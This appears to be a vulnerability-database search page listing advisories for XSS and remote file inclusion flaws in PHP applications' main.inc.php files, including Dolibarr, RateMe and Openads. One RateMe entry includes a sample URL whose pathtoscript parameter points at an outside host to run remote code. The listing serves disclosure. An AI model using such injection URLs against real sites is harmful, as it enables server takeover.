17 matches found
Cross-site Scripting (XSS)
dolibarr/dolibarr is vulnerable to Cross-Site Scripting. The vulnerability is due to a lack of sanitization for the key variable in the topmenu function within main.inc.php. This allows an attacker to insert malicious JavaScript code into the key variable resulting in Cross-Site Scripting...
Dolibarr ERP and CRM contain XSS Vulnerability
The testsqlandscriptinject function in htdocs/main.inc.php in Dolibarr ERP/CRM 6.0.4 blocks some event attributes but neither onclick nor onscroll, which allows XSS...
GHSA-QJQ9-WX5J-JRG6 Dolibarr ERP and CRM contain XSS Vulnerability
The testsqlandscriptinject function in htdocs/main.inc.php in Dolibarr ERP/CRM 6.0.4 blocks some event attributes but neither onclick nor onscroll, which allows XSS...
basebuilder <= 2.0.1 (main.inc.php) Remote File Inclusion Vulnerability
No description provided by source. Discovered by dun \ dunatstrcpy.pl basebuilder = 2.0.1 Remote File Inclusion Vulnerability Script site:...
RateMe <= 1.3.2 (main.inc.php) Remote File Include Vulnerability
No description provided by source.
openads-2.0.11 - Remote File Inclusion
openads-2.0.11 - Remote File Inclusion Exploit Title: Openads-2.0.11 Remote File inclusion Vulnerability Google Dork: Just open you eyes ; Date: 02/09/2011 Author: HaCkErS eV!L E-mail:[email protected] Software Link:...
openads-2.0.11 - Remote File Inclusion
Exploit Title: Openads-2.0.11 Remote File inclusion Vulnerability Google Dork: Just open you eyes ; Date: 02/09/2011 Author: HaCkErS eV!L E-mail:[email protected] Software Link: http://sourceforge.net/projects/phpadsnew/files/Current%20Release/Openads%202.0.11-pr1/Openads-2.0.11-pr1.zip/download...
basebuilder-rfi.txt
Discovered by dun \ dunatstrcpy.pl basebuilder = 2.0.1 Remote File Inclusion Vulnerability Script site: http://basebuilder.sourceforge.net/ Download:...
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in FirmWorX 0.1.2 allow remote attackers to execute arbitrary PHP code via a URL in the (1) bankdataroot parameter to modules/bank/includes/design/main.inc.php, or the (2) fmdataroot parameter to (a) includes/config/master.inc.php or (b)...
rateme-rfi.txt
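PanetLuc.Com RateMe Main.Inc.PHP Remote File Inclusion Vulnerability
RateMe is a PHP-based web application. RateMe does not properly filter user-submitted URI data, so a remote attacker can exploit the vulnerability to execute arbitrary commands with the privileges of the web process. The problem is that the 'Main.Inc.PHP' script does not filter the user-submitted 'pathtoscript' parameter; submitting a malicious remote server as the include target can lead to execution of arbitrary PHP code with the privileges of the web process. planetluc.com RateMe 1.3.2 No detailed solution is currently available: http://www.planetluc.com/ http://www.example.com/path/main.inc.php?pathtoscript=www.example2.com...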
RateMe <= 1.3.2 (main.inc.php) Remote File Include Vulnerability
No description provided by source.
RateMe <= all versions => ( main.inc.php ) Remote File Include Vulnerability
RateMe 1.3.2 - 'main.inc.php' Remote File Inclusion
RateMe 1.3.2 - main.inc.php Remote File Inclusion
RateMe 1.3.2 - main.inc.php Remote File Inclusion
RateMe <= 1.3.2 (main.inc.php) Remote File Include Vulnerability
Exploit for unknown platform in category web applications. RateMe = 1.3.2 main.inc.php Remote File Include Vulnerability...
CVE-2004-0248
CVE-2004-0248 describes a cross-site scripting (XSS) vulnerability in PHPX 3.2.3. The issue allows remote attackers to run arbitrary script as another user by injecting HTML or script into three inputs: the keywords argument of main.inc.php, the body argument of help.inc.php, or the subject field...